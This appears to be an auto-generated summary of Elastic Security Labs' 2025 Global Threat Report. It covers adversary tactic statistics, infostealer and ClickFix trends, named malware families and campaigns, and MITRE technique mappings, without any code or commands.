Elastic Security Labs’ 2025 Global Threat Report highlights AI-driven shifts in adversary behavior, including increased execution techniques on Windows, widespread use of infostealers targeting browser credentials, and concentrated cloud attacks focused on Initial Access, Persistence, and Credential Access. The report names specific threats and campaigns such as BANSHEE, EDDIESTEALER, ARECHCLIENT2, REF7707 (FINALDRAFT, PATHLOADER, GUIDLOADER) and calls out delivery methods like ClickFix and abuse of Microsoft GraphAPI. #BANSHEE #EDDIESTEALER #ARECHCLIENT2 #REF7707 #FINALDRAFT #PATHLOADER #GUIDLOADER
Keypoints
- Execution on Windows has risen to become the top tactic, surpassing Defense Evasion and growing to over 32% of observed techniques.
- Cloud security events are highly concentrated, with over 60% tied to Initial Access, Persistence, and Credential Access goals.
- Adversaries are leveraging AI/LLMs to produce generic malware loaders and tools, lowering the barrier to entry for cybercrime.
- More than one in eight malware samples target browser credential theft, fueling an access broker economy for cloud account compromise.
- Trojanized software (≈61% of samples) and ClickFix delivery methodology are major vectors for infostealers; ~24% of Windows samples are named infostealer families.
- Notable threat profiles and campaigns include BANSHEE, EDDIESTEALER, ARECHCLIENT2, and REF7707 (FINALDRAFT, PATHLOADER, GUIDLOADER) which used GraphAPI for command-and-control.
- Defense Evasion remains prominent but adversaries are favoring cheap footholds and rapid execution via scripts, browser-based techniques, and SaaS compromises.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Used via scripts and browser-based techniques to execute malicious code quickly: ‘Scripts and browser-based techniques … highlight areas where many enterprises could improve their defenses.’
- [T1204] User Execution – Trojanized software and ClickFix delivery relied on user interaction to install trojans and infostealers: ‘Trojanized software, which represented about 61% of all malware samples observed… the ClickFix methodology is one of the most common techniques used to deliver trojans and infostealers.’
- [T1078] Valid Accounts / Credential Access – Theft of browser credentials and credential access were a primary adversary goal in cloud events: ‘more than one in eight are designed to steal browser data… providing a steady supply of keys for other attackers to compromise corporate cloud accounts.’
- [T1105] Ingress Tool Transfer – Adversaries used downloaded loaders and tools (including those produced by LLMs) to stage further activity: ‘adversaries using large language models (LLMs) to quickly generate simple but effective malicious loaders and tools.’
- [T1566] Phishing (as part of Access Broker activity) – Access brokers used stolen credentials and infostealers to maintain distance, implying social-engineering and secondary use of harvested data: ‘Access brokers are increasingly using information stealers to maintain a distance from collective defense efforts.’
- [T1500] Application Layer Protocol (Microsoft Graph API misuse) – REF7707 campaign evaded defenses using Microsoft’s GraphAPI for C2: ‘REF7707… provides details about how an espionage-motivated threat evaded defenses using Microsoft’s GraphAPI for C2.’
- [T1588] Obtain Capabilities (use of third-party AI tools) – Adversaries and researchers used generative AI to develop capabilities; report notes third-party generative AI use: ‘we may have used or referred to third party generative AI tools…’
Indicators of Compromise
- [Malware Families] Reported threat families and campaigns – BANSHEE, EDDIESTEALER, ARECHCLIENT2, and REF7707 (FINALDRAFT, PATHLOADER, GUIDLOADER).
- [Techniques/Delivery] Delivery methodologies and artifact types – ClickFix delivery methodology, trojanized software, and infostealers (e.g., named infostealer families comprising ~24% of Windows samples).
- [Targeted Data] Stolen credentials / browser data – browser credential theft used to fuel access broker economy (over 1 in 8 samples targeting browser data).
- [Telemetry Categories] Tactic concentrations in telemetry – Execution (~32%), Defense Evasion (~23%), Initial Access (~19%) as observed technique distribution.
Read more: https://www.elastic.co/security-labs/elastic-publishes-2025-global-threat-report